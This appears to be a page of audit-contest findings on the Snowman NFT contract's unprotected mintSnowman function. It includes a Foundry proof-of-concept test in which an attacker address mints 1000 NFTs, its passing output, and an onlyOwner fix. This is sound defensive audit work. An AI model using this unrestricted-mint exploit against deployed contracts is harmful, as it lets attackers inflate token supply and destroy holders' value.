The mintSnowman function in the Snowman contract is marked as external but lacks any access control modifiers.
because of this any address can call the function directly and mint as many snowMan NFTs as they want without staking any Snow tokens
Likelihood:
The vulnerability is exploitable immediately upon contract deployment, as the mintSnowman function is publicly callable by any external address without requiring any prior state changes or permissions.
This occurs whenever an external actor interacts directly with the Snowman contract, allowing them to bypass the intended SnowmanAirdrop staking mechanism and mint tokens without providing the required Snow collateral.
Impact:
An attacker can mint an infinite supply of Snowman's NFTs to themselves in a single transaction. This could break the tokenomics of the airdrop hence destroying the scarcity of the NFT, it renders the SnowmanAirdrop contract useless since people can just mint for free
You can prove this by writing a simple Foundry test where a random "attacker" address calls the mint function directly and walks away with 100 NFTs for free.
This test simulates a malicious user interacting directly with the Snowman contract. Because there are no access control checks in place, the vm.prank allows our fake attacker to successfully execute the mintSnowman function without staking any Snow tokens. The assertions at the end confirm that the attacker's NFT balance increased by exactly 100, proving that the minting logic is completely unprotected and can be exploited by any external address.
You need to restrict who can call this function. Since the SnowmanAirdrop contract is the only one that should be minting these, you should pass the airdrop address into the Snowman constructor and restrict the function to it.
This fix ensures that only the authorized SnowmanAirdrop contract can trigger the minting process. By saving the airdrop contract's address as an immutable variable during deployment and creating a custom onlyAirdrop modifier, we enforce a strict check on msg.sender. Now, whenever mintSnowmanis called, the contract verifies that the caller is the official airdrop contract. Any direct calls from regular users or malicious actors will immediately revert with the SM__NotAllowed error, completely closing the infinite minting loophole.
# Root + Impact ## Description * The Snowman NFT contract is designed to mint NFTs through a controlled airdrop mechanism where only authorized entities should be able to create new tokens for eligible recipients. * The `mintSnowman()` function lacks any access control mechanisms, allowing any external address to call the function and mint unlimited NFTs to any recipient without authorization, completely bypassing the intended airdrop distribution model. ```Solidity // Root cause in the codebase function mintSnowman(address receiver, uint256 amount) external { @> // NO ACCESS CONTROL - Any address can call this function for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } @> // NO VALIDATION - No checks on amount or caller authorization } ``` ## Risk **Likelihood**: * The vulnerability will be exploited as soon as any malicious actor discovers the contract address, since the function is publicly accessible with no restrictions * Automated scanning tools and MEV bots continuously monitor new contract deployments for exploitable functions, making discovery inevitable **Impact**: * Complete destruction of tokenomics through unlimited supply inflation, rendering all legitimate NFTs worthless * Total compromise of the airdrop mechanism, allowing attackers to mint millions of tokens and undermine the project's credibility and economic model ## Proof of Concept ```Solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.24; import {Test, console2} from "forge-std/Test.sol"; import {Snowman} from "../src/Snowman.sol"; contract SnowmanExploitPoC is Test { Snowman public snowman; address public attacker = makeAddr("attacker"); string constant SVG_URI = "data:image/svg+xml;base64,PHN2Zy4uLi4+"; function setUp() public { snowman = new Snowman(SVG_URI); } function testExploit_UnrestrictedMinting() public { console2.log("=== UNRESTRICTED MINTING EXPLOIT ==="); console2.log("Initial token counter:", snowman.getTokenCounter()); console2.log("Attacker balance before:", snowman.balanceOf(attacker)); // EXPLOIT: Anyone can mint unlimited NFTs vm.prank(attacker); snowman.mintSnowman(attacker, 1000); // Mint 1K NFTs console2.log("Final token counter:", snowman.getTokenCounter()); console2.log("Attacker balance after:", snowman.balanceOf(attacker)); // Verify exploit success assertEq(snowman.balanceOf(attacker), 1000); assertEq(snowman.getTokenCounter(), 1000); console2.log(" EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization"); } } ``` <br /> PoC Results: ```Solidity forge test --match-test testExploit_UnrestrictedMinting -vv [⠑] Compiling... [⠢] Compiling 1 files with Solc 0.8.29 [⠰] Solc 0.8.29 finished in 1.45s Compiler run successful! Ran 1 test for test/SnowmanExploitPoC.t.sol:SnowmanExploitPoC [PASS] testExploit_UnrestrictedMinting() (gas: 26868041) Logs: === UNRESTRICTED MINTING EXPLOIT === Initial token counter: 0 Attacker balance before: 0 Final token counter: 1000 Attacker balance after: 1000 EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.28ms (3.58ms CPU time) Ran 1 test suite in 10.15ms (4.28ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests) ``` ## Recommended Mitigation Adding the `onlyOwner` modifier restricts the `mintSnowman()` function to only be callable by the contract owner, preventing unauthorized addresses from minting NFTs. ```diff - function mintSnowman(address receiver, uint256 amount) external { + function mintSnowman(address receiver, uint256 amount) external onlyOwner { for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } } ```
The contest is live. Earn rewards by submitting a finding.
Submissions are being reviewed by our AI judge. Results will be available in a few minutes.
View all submissionsThe contest is complete and the rewards are being distributed.